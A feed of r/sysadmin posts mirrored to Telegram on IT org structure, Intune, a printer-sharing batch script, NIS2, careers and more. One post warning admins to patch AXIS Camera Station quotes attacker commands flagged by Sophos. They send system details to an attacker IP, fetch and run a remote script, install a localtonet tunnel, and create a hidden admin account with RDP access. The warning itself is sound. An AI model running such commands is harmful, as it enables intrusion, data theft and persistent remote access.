-
Reddit SystemAdmin. Thanks @reddit2telegram and @r_channels.
How does your org structure IT & Security?
Most of my experience comes from SMB orgs where all SecOps responsibilities fell to the sysadmins. We'd work with internal auditors to meet compliance frameworks, but that was about the extent of it. How are y'all doing it? It feels like every company draws the lines differently.
I've seen some places where Security is its own separate team with its own leadership chain, reporting up to a CISO. At others, Security and sysadmins falls under the same IT leadership. I would think keeping things under the same team would be more efficient and less confrontational when things like false positives come up, but I could be totally wrong here.
Also, do your security team members actually "do the thing" or do they just report it? If they just report the security finding and CVEs, does that make it better, or does that cause friction because it's just one more department requesting things from IT?
So I’m curious, in your org, is it:
IT and Security (two completely separate teams)?
IT with Security (one team to rule them all)?
Or is it just you or a small team of sysadmins wearing all the hats?
If you’ve worked in more than one setup, which one actually worked best in practice and why?
https://redd.it/1muhnbn
@r_systemadmin
r/ceph banned ?
so /r/ceph got banned ? rule 2 ? anyone know what happend ? any /r/ceph mods around that could appeal ? suck to lose a technical subreddit
https://redd.it/1muftg1
@r_systemadmin
Best practice for running a detection as user but remediation as Admin (Intune)
So in my work environment, I've noticed that we have two sets of Edge installed on the majority of EU devices. This means that only one version is being updated regularly. The stable version appears to be pushed out via our Windows Autopatch groups; however, our patch management solution seems to update clients to the beta version of Edge. Because of this, the stable version is usually left on the device, but as an old version. Which then flags as an issue from a CS standpoint.
I had in mind to write a detection script to locate if Edge Stable was installed, and if it was under a certain version (eg 138.x), then it would remove the appx package, leaving the beta version, which is up to date. I have written and tested the detection script, and this works without issue; however, this only works at the user level. Meaning I have to run it with the logged-on credentials to ensure Intune can find the Appx package when running the script. However, to then remove the appx package, this requires system permissions. I have tried to adjust my script to allow searching as the user, but this just returns no issues.
Would best practice simply be deploying a Win32 app to delete any version LT 138.x, or is there a simpler way to detect and delete that I am missing? I have tried to find similar cases to what I am experiencing, but they all differ in large ways.
Any help is much appreciated.
https://redd.it/1mucp4n
@r_systemadmin
Win11 24H2 Printer Sharing Fix
I made this script to help myself and others out there to fix the issue with Win11 24H2 printer sharing.
I was getting the error 0x00000709 before this fix.
Setup:
1. Win11 computer with shared printer (server)
2. Win11 computers as clients
3. Win10 computers as clients
Before running the batch file, I did the following:
1. Set network type to Private
2. Enabled network discovery, file and printer sharing
3. Disabled public folder sharing, password protected sharing
Made the batch file below and run it as admin on both client and server computers.
Restarting may be needed but in my case I didn't need to (your mileage may vary)
Any feedback to improve the script will be appreciatedecho off:: =========================================:: Configure RPC for Printers with Fixed Port:: =========================================echo ===================================echo Windows 11 24H2 RPC with fixed portecho ===================================echo.:: Set a fixed port (example: 601)echo Setting RpcTcpPort to 601reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v RpcTcpPort /t REG_DWORD /d 601 /fecho.:: Configure RPC protocol settingsecho Registry entry: RpcUseNamedPipeProtocol = 1reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v RpcUseNamedPipeProtocol /t REG_DWORD /d 1 /fecho.echo Registry entry: RpcProtocols = 0x7reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v RpcProtocols /t REG_DWORD /d 0x7 /fecho.echo Registry entry: ForceKerberosForRpc = 0reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\RPC" /v ForceKerberosForRpc /t REG_DWORD /d 0 /fecho.:: Add firewall rule for port 601 if it does not already existnetsh advfirewall firewall show rule name="Print-RPC 601" >nul 2>&1if errorlevel 1 (echo Adding firewall rule: Print-RPC 601netsh advfirewall firewall add rule name="Print-RPC 601" dir=in action=allow protocol=TCP localport=601 profile=private) else (echo Firewall rule "Print-RPC 601" already exists):: Add firewall rule for endpoint mapper (135) if it does not already existnetsh advfirewall firewall show rule name="Print-RPC Endpoint Mapper" >nul 2>&1if errorlevel 1 (echo Adding firewall rule: Print-RPC Endpoint Mappernetsh advfirewall firewall add rule name="Print-RPC Endpoint Mapper" dir=in action=allow protocol=TCP localport=135 profile=private) else (echo Firewall rule "Print-RPC Endpoint Mapper" already exists):: Restart the Print Spooler serviceecho.echo Restarting Print Spooler...net stop spooler >nul 2>&1net start spoolerecho.echo Done! Printer RPC settings have been configured.pause
https://redd.it/1mu987n
@r_systemadmin
I did it, I've send that angry but still professionally sounding mail to the higher ups.
Hi my fellow Sysadmins! I'm just a lone IT wold here with a very busy IT manager. After getting out of today's meeting every last bit of my patience was gone, the drive back home was quiet and finally i got home and desided to send my thoughts via a mail, here is the mail quoted :
After today’s ISO review meeting, I felt it was important to share a short follow up from IT side.
Over the past months I’ve spent a significant amount of time including evenings and weekends to successfully migrate our infrastructure from VMware to Proxmox. This wasn’t just a technical task, it was a strategic move aimed at reducing long term costs and keeping the company away from unnecessary licensing expenses from VMWare now owned by Broadcom.
This is already paying off for the company and will continue to do so over the coming years.
That’s why I was honestly a bit disappointed with the way today’s discussion focused only on “the missing documentation or this is taking to long” and didn’t seem to recognise the amount of work that has already been completed to get us here.
IT is not “waiting” on anything, we’ve actively been building the foundation to switch over to Proxmox and we are finally here.
genuinely want to keep moving forward and get this fully completed, but I also hope the work done so far is acknowledged, IT may look expensive for MT but these are just basic necessity to keep an on-premise enterprise level network up and running and most importantly updated.
That said, I stayed a bit longer today and completed the Backup Documentation and it was attached as PDF. It includes all required elements (RPO/RTO, retention periods, restore testing and quarterly audit checklist) and is now ready for review.
Important: we still need management approval for the NAS or a separate U1 server for Proxmox Backup Server in order to actually implement this plan and finalize this ISO control section.
Without one of these hardware, IT simply cannot implement the required backup infrastructure, no matter how much documentation is produced.
Btw this said company was running VMware v6.0 till last week that over completed the migration over to Proxmox.
I've been only 10 years into IT, and today was it. I've had enough guys, it feels like no one's cares how much effort we are putting to keep everything running smooth and top notch! From the firewall to the bare basics like good quality monitors for the workstations. Everything looks like a another expense from IT again, it's running why update it?
Man yes thank you all for hearing my rant tonight.
And yeah I stayed calm in the meeting while i was boiling up a bit from the inside.
https://redd.it/1mu4yjx
@r_systemadmin
annual budgets for one thing. Because, unfortunately - people have to eat too and keep the lights on. And no, the cloud is not cheaper in this case, if in any and not a solution to any and every problem. It will just spread out the expenses, but won't liquidate them. And you for sure don't want certain data in the cloud.
Perhaps my opinion is controversial, perhaps it will lead to major number of downvotes. But that's the sad truth and the reality we live in. We will fine organizations like hospitals already in financial deficit and struggling...because they have no money. And those hospitals are struggling, because...the same governments that will fine them give them no money. It's paradox. Or we all will turn a blind eye and the compliance will be only on paper and security breaches and entire organizations and government institutions will continue to be regularly paralyzed by such attacks.
It's almost like(figuratively speaking) demanding the crippled to run or you will beat them as punishment and take away their last money for food from them.
https://redd.it/1mtxv8w
@r_systemadmin
Custom internal email to 10K+ users
We're a Micosoft *365 shop.
I've poked around a little, but thought I might ask this question here. HR wants to send an individual email to 10K+ people. The email will contain benefits information that's individualized. They would like to use mail merge to send these, but our Defender anti-spam policy stops after they reach their daily limit of XXX emails and blocks the HR person's account until IT intervenes. They can't do any of the normal things to get around this policy like a distribution list because each email is customized. How do most organizations handle needs like this?
Copilot suggests replacing the Anti-Spam policy and adding a custom one that excludes the users that need this feature. I'm wondering if there is a better way.
Our HRIS system is UKG Pro, I wonder if it can do that emailing. If so, what module is it so that I can see if we have that module.
How does your organization handle something like this?
https://redd.it/1mtv8j1
@r_systemadmin
Everyone knows what an email address is, right?
Saw this on Bluesky: https://bsky.app/profile/samwho.dev/post/3lwmf4y5kys2w
Direct link: https://e-mail.wtf/
I know sysadmins (especially those who've had to herd MTAs and not just MUAs) will score high or even perfect on this quiz, so I figured I would pass it along.
I scored 18/21 though, not sure how these are valid email addresses, and the quiz doesn't offer what RFC and where affirms or refutes each example:
* ` maybe-like-this @example.com` (leading/trailing space for local part is fine?)
* `fed-up-yet@ example.com ` (leading/trailing space for domain part is fine?)
* `""@example.com` (empty local part should be invalid, but escaping it makes it fine?)
https://redd.it/1mtt1su
@r_systemadmin
I went from SysAdmin, to Saas Admin, now I want to go SRE. Career advice?
General DIsclaimer: I have no college degree. All of my tech experience started in the DoD and now I'm in the civiliar sector (I have about ten years in this career field now).
As the title states, I started as a traditional SysAdmin. On site infrastructure, active directory, VMware, etc. I work fora company now that has shifted and is now a primary SaaS toolset (zoom, google workspace) and I just....don't really enjoy it anymore.
I want to get into cloud computing/SRE, and I was wondering if any folks here have made that transtition? What are your daily/weekly/monthly duties like? What tools do you use? What are skill gaps that you wish you had?
https://redd.it/1mtnyon
@r_systemadmin
Trying to get Adobe to remove a malicious file from their cloud platform is like trying to get blood from a stone. Help!
A client of ours has been sent an e-mail with a link to a malicious hosted adobe document due to one of their suppliers being hit recently.
The hosted document then links to a phishing site. I'm trying to work with Adobe to get the file removed but it's like getting blood from stone trying to get their support to do anything remotely useful. Refusing to do anything as we don't have an active licensed account. I'd have thought they'd want to know if they were hosting malicious files but evidentially not! Last message was "ask the bad guy to stop sharing the file".
Useful.
If anyone has any tips to get them to actually remove the file it would be gratefully appreciated.
https://redd.it/1mtltc1
@r_systemadmin
Do you have an LB for DNS pointing to ADDS servers?
Hi. My friend and I are discussing servers having their primary and secondary DNS settings on NICs point to Load Balancers at two different locations for site resiliency. I think its pretty common, just dont try to LB ADDS itself, just the DNS. He says nobody does that and everyone sets to servers directly which of course im fully aware of and is standard stuff. My question is who amongst us sets their Windows servers to use DNS from sets of LBs fronting ADDS servers?
Whats your experience like?
https://redd.it/1mtjxqk
@r_systemadmin
Moronic Monday - August 18, 2025
Howdy, /r/sysadmin!
It's that time of the week, Moronic Monday! This is a safe (mostly) judgement-free environment for all of your questions and stories, no matter how silly you think they are. Anybody can answer questions! My name is AutoModerator and I've taken over responsibility for posting these weekly threads so you don't have to worry about anything except your comments!
https://redd.it/1mthrl8
@r_systemadmin
Outlook PWA - user deletes email on "touch"
Outlook PWA - I'm the user and the Outlook system administrator. When I touch an email in the computer's touchscreen sometimes the email is deleted. I don't see any Option or any other way to detect why this happens. I can go to deleted items and reinstate the email into the Inbox, but this is annoying. As far as I know a touchscreen registers a touch like a mouse click. Clicking on an email should not send it to the deleted items folder, correct? Not seeing any pre-made rule or anything else logically causing this to happen.
https://redd.it/1mtddaz
@r_systemadmin
DNS issue- Update issues, IP conflicts etc
Good day, this is the issue I am currently facing.
We have 3 DCs, and 5 DHCP servers in 5 different areas of the country.
Previously we had 5 RODCs in these 5 areas, which were then replaced with the DHCP servers.
We notice that the DNS isn't always being updated by the DHCP servers, but I am not sure what updates the DNS, when the updates actually do happen.
Should I add the DHCP servers to the Security tab of the DNS, with read/write access? Or should I create a AD user with admin access to perform the DHCP to DNS update? This would be configured on the DHCP server.
Please note that we also get some 'BAD_ADDRESS" in the DHCP servers, which is most likely caused by IP conflicts.
Please advise on the best way forward.
Thank you.
https://redd.it/1mtamcc
@r_systemadmin
Your biggest fuckup you done?
Worked for school and accidently shut down the whole network by Accidently selecting all AP and giving them restart while school digital exams were on....
https://redd.it/1mt7nmu
@r_systemadmin
If OS platforms were StarCraft races…
I was working on integrating all OS platforms into Intune (corporate, BYOD, etc.) and suddenly realized there’s a StarCraft analogy for operating systems:
Windows = Terran
The standard army. Mass-produced, flexible, built for control and infrastructure. They’re everywhere, and they dominate simply by sheer numbers and resources.
macOS = Protoss
Sleek, powerful, expensive, and extremely polished. Everything is tightly integrated and optimized. The “elite units” of the OS world
Linux (Ubuntu and friends) = Zerg
Open-source, swarming in countless variations (distros). They’re simple at the core, but extremely adaptive. And just like Zerg can overwhelm with numbers, Linux can become incredibly powerful with some good bash scripts.
BSD = Xel’Naga — the ancient, almost godlike foundation from which both macOS (Protoss) and Linux (Zerg) ultimately descend
Don't be too serious at work :)
btw, I use Arch (and prefer Warhammer40k)
https://redd.it/1mui5z8
@r_systemadmin
Do logon banners have any legal weight?
You know, that "This is an ABC, Inc. computer system, unauthorized use prohibited, blah blah blah"? I hate that extra click/keypress, and I've always just kinda assumed that it had about as much legal weight as people who claim they're going to call their lawyers (that they don't have) and sue you, which is none.
https://redd.it/1mug1c9
@r_systemadmin
How long does it take you to assess working for a new company?
28th year in IT. Got hired last Monday with an MSP. White Glove Service, good sales pitch.
During my onboarding, I was not provided a list of the basics. No written or online company policies. No list of products that the company uses as its standards, etc. Easy oversight. So I went to my supervisor, asked for the product list and policies. Was directed to the Ticketing System.
Digging around, notice the dates- 3 years of data, so recent migration, can't find what I need. So I pop into the President's office. Was referred to the Ticketing System.
Fine, this is a figure it out environment. So I looked at every document in the company section. Didn't take long; information does not exist. Pick some random clients and look. We are 3 hours into the day, and I have a clear picture. There is no usable documentation internally, poor client documentation, and a lack of foundation for some basic business practices.
Nope. I was not hired for this. 3 hours in..lol
Worked out the week, collected my pay, and went home.
Sent an email to the President with a list of things I would like to discuss on Monday. He replied to my personal email "This email is unexpected, extremely unprofessional, and absolutely incorrect on all counts. Yada yada, will you be at work on Monday?". LOL you already fired me, I'm not stupid.
I have to go there, forgot my glasses. So I reply, "Sure, see you on Monday."
So when I was greeted at the door with a box for me, I was relieved, those are expensive glasses...LOL
https://redd.it/1mub8v4
@r_systemadmin
What is the least irritating printer I can buy and personally use as a blind person?
I’m a half-assed sysadmin who runs some websites and plays with Linux servers for fun. I don’t know if that makes me one of you or not, but I know there are people here who have to deal with printers. (You have all of my sympathies, by the way.)
I had an HP Laserjet P1505N that has been hooked up to my Windows server for about 10 years. It finally stopped working and I honestly don’t know if I can be bothered doing the work to figure out why. If I can’t figure it out, I want a replacement that works with just as little fuss as this one does. I really don’t want to have to touchscreen my way to getting on wi-fi or whatever, because that will be the point where I’ll have to video-call someone. I need something that either has a web interface or very simple USB operation, and I’d really like the minimum number of on-device controls. Does this exist anymore, or have we reached the point where every printer has a whole operating system and UI?
tl;dr: If you already had a print server and just wanted something that would shut up and work with your print server, what would you buy?
https://redd.it/1mu4orj
@r_systemadmin
Boss quit, don’t know what to do
I was hire as a desktop support for my country, my boss was in the US, he was sys admin for the entire company even giving support to everyone all day.
He hired me and another guy to do desktop support and asset management basically.
He quit because they didn’t gave him the recognition he deserved and I am reporting to the VP of HR now, doing literally nothing except buying IT equipment, asset tracking and thats it because the guy that took my boss job/support channel is not even my boss.
I feel useless and don’t even have access to anything like Okta admin Slack or other things to learn some sys admin skills.
I thought about talking to this new sys admin guy although i dont have experience I would like to be his vassal but I dont think he has the time to explain me shit.
What tools/technologies could I learn to have some advantage in my wasted working hours?
Its a startup, security is almost non existent and everything is kind of a mess. Most things are automated with okta and our own CRM app.
https://redd.it/1mu10b4
@r_systemadmin
What are your opinions about NIS2?
What are your opinions about the new European directive NIS2?
I will express my opinion in this post. All constructive comments and opinions are welcome.
While I think that we all recognize the importance of information and cyber security, it seems like NIS2 is close to impossible to be implemented in many organizations.
There are 3 main points that I would like to present:
1. The directive itself is extremely unclear, gives no practical measures or recommendations to be implemented. This leaves the interpretation of the directive up to the personal opinion of the people in the control organs. It is very easy to write something, while you actually say nothing. No practical measures that should be taken or clear requirements mean that no matter what measures are taken, it can always be said that the measures are inadequate. Lack of clear guidelines means high potential for corruption and using the directive in a way it was never intended to be used
2. Practical implementation of the directive when it comes to shared terminals and limited budgets is close to impossible. Many organizations use shared terminals/computers, where different shifts must use the same group of computers to do their job and perform work related tasks. In the most basic AD configuration, the user folders are located on the local computer. Imagine a computer where 10, 20 or more people log every day. Centralizing the storage of all that information is potential point of failure and would require significant amounts of storage, for example. Which leads me to the next point
3. The directive unilaterally defines what companies/enterprises/organizations fall under it's scope, yet not only the directive itself is unclear, but implementing it is extremely expensive. We are talking about hardware and software..including storage, servers, software tools and so on.
As we all know organizations that receive government funding usually receive extremely limited IT funding, if actually any. One one hand the directive demands, on the other hand a number of organizations exist that must operate, yet there is no budget to implement it. It's Catch22.
For example, all around the world, many industries and organizations use old equipment because it is prohibitively expensive to replace it. In US there were attacks of hospitals still using WindowsXP long past it expiration date. Yet, the reason is pretty simple. Vendors of specialized equipment rarely use the latest versions of OS and software packages, because certification of such equipment is expensive. And such organizations don't replace it because it is prohibitively expensive to do so.
So, we are in a situation with no real IT budgets and no budgets to replace equipment running legacy operating systems and software, no vendors offering equipment using the latest stable and secure versions of the OS due to prohibitively expensive recertification, having extreme amounts of technical debt and no real way out for such organizations.
________________
Final thoughts - I really don't know what will happen. Is it better for example..to close almost every hospital or fine it, while the healthcare sector for example is in permanent struggle and financial deficits? And who will take care of patients and treat them if that happens? Same for most other organizations in similar situations. Rarely even the branches of the government institutions have the latest and most super-duper secure servers on premises with the latest versions of everything, as both computers and software cost money. Go to any government institution anywhere and observe with what those people are forced to work on a daily basis. So, the governments should close themselves? Or we can think of more practical and actually sound measures for cyber security that don't require external audits by companies that exist solely to leech money from the unfortunate and extort them and not to impose requirements that literally force administrations, hospitals and organizations to spend half of their total
Patch your AXIS camera station servers, especially if you are using port forwarding. Sophos MDR caught and stopped malicious activity on a headless computer that was only running Camera Station.
Over the weekend I received a call from Sophos SOC. I was a little skeptical at first, but then I saw the localtonet.exe and the various commands. I also googled and found an AXIS advisory. Again, no one uses this computer. It has no keyboard or mouse and it just runs camera station. I strongly suspect this to be related to the vulnerability.
https://www.axis.com/dam/public/9b/a5/72/cve-2025-30023pdf-en-US-485733.pdf
Below is what Sophos shared. I replaced the IP address with the country of origin. We are in the U
1. Invoke-WebRequest -Headers @{"User-Agent"="$env:COMPUTERNAME"} -Uri "hxxp[://\]IP in France/log" -Method Post -Body ((Get-PSDrive -PSProvider FileSystem | Select-Object Name, @{Name='Used(GB)';Expression={[math\]::round($_.Used/1GB,2)}}, @{Name='Free(GB)';Expression={[math\]::round($_.Free/1GB,2)}}, @{Name='Total(GB)';Expression={[math\]::round($_.Used/1GB + $_.Free/1GB,2)}}) | ConvertTo-Json) -ContentType "application/json"
2. Invoke-WebRequest -Headers @{"User-Agent"="$env:COMPUTERNAME";"NUMBER_OF_PROCESSORS"="$env:NUMBER_OF_PROCESSORS";"WinVer"=(Get-WmiObject win32_operatingsystem).Caption} -Uri "hxxp[://\]IP in France/log" -Method Post -Body (((Get-PSDrive -PSProvider FileSystem | Select-Object Name, @{Name = 'Used(GB)'; Expression = { [math\]::round($_.Used / 1GB, 2) } }, @{Name = 'Free(GB)'; Expression = { [math\]::round($_.Free / 1GB, 2) } }, @{Name = 'Total(GB)'; Expression = { [math\]::round($_.Used / 1GB + $_.Free / 1GB, 2) } }), (Get-LocalUser | Select-Object Name,Enabled,Description),(Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress),(Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property Manufacturer,Model,Domain,Name,DNSHostName,UserName,PrimaryOwnerName,HypervisorPresent) ) | ConvertTo-Json) -ContentType "application/json"
3. Invoke-Expression(IRM -Headers @{"User-agent"="$env:COMPUTERNAME/$env:USERNAME"} "hxxp[://\]IP in France/script")
4. cd $env:temp; IWR hxxps[://\]localtonet[.\]com/download/localtonet-win-64[.\]zip -OutFile localtonet[.\]zip; Expand-Archive localtonet[.\]zip -DestinationPath .; .\\localtonet[.\]exe authtoken buqCDfHX57A08jnrV1MpGcJTByo2KgmNz
5. Invoke-Expression(IRM -Headers @{"User-agent"="$env:COMPUTERNAME/$env:USERNAME"} "hxxp[://\]IP in France/script")
6. cd $env:temp; IWR hxxps[://\]localtonet[.\]com/download/localtonet-win-64[.\]zip -OutFile localtonet[.\]zip; Expand-Archive localtonet[.\]zip -DestinationPath .; .\\localtonet[.\]exe authtoken buqCDfHX57A08jnrV1MpGcJTByo2KgmNz
Observed Commands: a few of them for the user 'AXIS'
"C:\\Windows\\system32\\reg.exe" add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\WindowsNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist /t REG_DWORD /d 0 /f /v AXIS
"C:\\Windows\\system32\\net.exe" localgroup Administrateurs /add AXIS
"C:\\Windows\\system32\\net.exe" localgroup "Remote Desktop Users" /add AXIS
C:\\Windows\\system32\\net1 localgroup "Remote Desktop Users" /add AXIS
C:\\Windows\\system32\\net1 user AXIS /active:yes
https://redd.it/1mtt93k
@r_systemadmin
Helpdesk dude doing Linux work - need help
I started my first IT job month and a half ago, my only prior experience was IT Technical High School, in which I learned a couple of basic things, and I also did some home labbing in my freetime. I was asked to look into our Apache server and fix some recurring outage, and I did it. Now I'm getting asigned more Linux related tasks. I really want to learn something and I think Linux would be a great career specialization. I need some tips for a fresh guy. I feel really incompetent.
What things I should look out for? Are there any must-read books or great videos to watch? Can I do anything to make myself look (and feel) less incompetent? How can I learn Linux administration in a reasonable pace?
Any tips greatly appreciated.
https://redd.it/1mtqyj6
@r_systemadmin
The CD celebrates 43
Hi all,
If you are older than 40 years old you will remember the "Books" we had with all the CDs inside for all kinds of Programs, OS, Drivers etc.
I still remember that I had one Book that weighted approx. 6 Pounds and was my "Survival Kit" for all kinds of problems, mostly drivers for every printer/scanner on the planet and was always in my bag "ready for action".
I had another 2 CD Books with my music collection for my DJ side work and these weighted more but it's another story.
https://www.techspot.com/news/109098-cd-turns-43-format-changed-music-forever.html
https://redd.it/1mtn49b
@r_systemadmin
buypass are retiring their TLS/SSL issuing service
Just received today that they are retiring their TLS/SSL services.
> IMPORTANT INFORMATION about TLS/SSL Certificates from BUYPASS AS
>
>You are receiving this email with IMPORTANT INFORMATION about TLS/SSL Certificates from Buypass because you are authorized to apply for TLS/SSL Certificates on behalf of one or more of your customers (Subscribers) as representative for a Partner in Buypass ID Manager. Or you have the authority to authorize Certificate Applicants on behalf of a Partner in ID Manager.
>
>Buypass has decided to terminate the service for issuing TLS/SSL Certificates. Certificates may be applied for until 15 October 2025. The last issuance date will be 31 October 2025.
>
>All certificates issued by 2025-10-31 will remain valid until they reach their expiry date or are revoked.
>
>We will also send notifications to your customers' Contract Signers. Please inform other relevant representatives of your affected customers.
>
>Click here for more information about the termination and the background for this decision
>
>Thank you for choosing Buypass as your TLS/SSL certificate issuer. We regret any inconvenience a change of issuer may cause.
>
>We continue to provide Enterprise Certificates, and other solutions within ID and digital signing are not affected.
>
>
>Kind regards, BUYPASS AS
https://www.buypass.com/products/tls-ssl-certificates/discontinues-issuance-of-tls-ssl-certificates
Too bad, since their wildcard certificates were pretty cheap. Will have to change to GoDaddy or try migrating some services to using DNS-01 challenge.
https://redd.it/1mtlaq5
@r_systemadmin
Smallish non-critical wireless renew
New job and been tasked with a low priority project to renew or expand the existing wireless infra. Currently there is a bunch of LANCOM APs (German network gear manufacturer).
About 25 APs with one main site (20 APs ) and 2 small other branches (2-4 APs ). On-Prem is a hard requirment. 90% of workplaces have a wired connection and from what I gather, wireless is used for meetings or guests.
Nothing fancy is required. 2-3 SSIDs with a bit of guest network stuff.
While I have no clear budget, cost is of medium importance.
Currently Ubiquiti seems like the obvious winner here since I can do on Prem with their network control server and their APs are so much cheaper than the rest. I looked at Cisco but if I need a Cisco C9800 (Meraki is out because Cloud) and will be much much more expensive than Ubiquiti. LANCOM is less expensive then Cisco but still more expensive and their management is just super clunky.
Am I missing something here?
https://redd.it/1mthcbe
@r_systemadmin
Are people actually moving away from VMware ESXi, if they are where are they going (Hyper-V, OpenShift Virtualization, etc)?
Same as title.
https://redd.it/1mtgugo
@r_systemadmin
Moving RDS farm to new IPS
Hi All.
Disclaimer: I am googling this as well but haven't found a specific answer yet.
We are having to move some VM's from one hosting location to another. unfortunately for us the IP range they are on now is already being used for something else in the new location, so we have to give them new IP's in the process. Mostly this is fine.
One of the next things to move is a 2 VM's RemoteDesktopServices farm where one of them is also the gateway etc, and also 1 NPS server that the RDS talks to for MFA via Azure.
Has anyone done this, and do you happen to know of any major Gotcha's to watch out for when doing this?
Thankfully there is a plan B if it doesn't work, but ideally we just change the IP's and move them to their new home.
Thanks in advance for any advice and tips.
https://redd.it/1mtbvwd
@r_systemadmin
Centralized VDI / Virtual Workstation Setup for 3D Modeling & CNC – Need Advic
Hey folks,
I work in a small company where every worker currently has their own desktop PC. Right now, we have:
• 5 workstations for 3D modeling (programs that need good GPUs)
• 2 workstations for CNC workers (they process codes that need good CPUs)
We are planning to double this setup as we expand.
Instead of continuing to buy individual high-end PCs, I’m looking into whether we can:
• Have one or more central servers powerful enough to run multiple VMs / virtual desktops
• Each VM would act as the user’s workstation
• Users would connect from thin clients or lower-end PCs
• Needs to handle heavy GPU workloads (3D modeling) and CPU-heavy tasks (CNC code processing)
Basically a VDI setup but for high-performance workloads, not just office tasks.
Questions:
How to achieve this ? Cause i think that it is achievable just I cont know !
NOTE : its my first time VDI and things like this dont have any idea !
Any advice from people who’ve done VDI for CAD / 3D modeling / CNC would be super helpful.
Thanks!
https://redd.it/1mt4kix
@r_systemadmin
Built a small tool to save me hours curious if others do this
I threw together a little automation recently to streamline one of those repetitive admin chores that no one loves doing. It’s nothing fancy, but it’s already saved me a ton of time.
I’m curious what’s the smallest script, workflow, or tweak you’ve made that ended up being a huge quality‑of‑life upgrade?
https://redd.it/1mt74hr
@r_systemadmin